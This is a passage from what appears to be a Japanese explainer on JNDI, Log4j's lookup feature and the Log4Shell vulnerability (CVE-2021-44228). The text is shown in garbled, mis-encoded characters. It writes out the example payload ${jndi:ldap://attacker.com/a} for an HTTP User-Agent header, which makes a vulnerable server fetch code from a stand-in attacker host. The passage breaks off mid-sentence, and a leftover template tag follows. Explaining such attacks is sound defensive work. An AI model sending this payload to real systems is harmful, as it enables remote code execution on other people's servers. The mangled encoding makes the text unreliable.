JNDI ã¨ã¯Java Naming and Directory Interface ã¨ãããJava ã¢ããªã±ã¼ã·ã§ã³ã DNS ã LDAP çã®ãµã¼ãã¹ãå©ç¨ããããã®æ±ç¨çãªã¤ã³ã¿ãã§ã¼ã¹ (ã©ã¤ãã©ãª) ã§ãã Log4j 㨠JNDI lookupApache Software Foundation ãéçºãããJava ãã¼ã¹ã®ãã®ã³ã°ã«é¢ããã©ã¤ãã©ãªã§ããJNDI lookup ã¨ããæ©è½ããããæ¸ãè¾¼ãã ãã°ã®ä¸é¨ãèªåã§å¤æ°åãã¾ããä»åã¯ãã®æ©è½ãæªç¨ããã¦ãã¾ãã CVE-2021-44228 ã®æ»æã·ã¼ã±ã³ã¹ã®ä¾ æ»æè ã¯èå¼±æ§ãããªã¬ã¼ããããã« http ãããã® User-Agent ã« ${jndi:ldap://attacker.com/a} ã¨ããæååãåãè¾¼ã¿ãhttp ãªã¯ã¨ã¹ããéä¿¡ãã¾ããèå¼±æ§ã®ãããµã¼ãã® Java App ã¯ãã®éä¿¡ã
{{#tags}}- {{label}}
{{/tags}}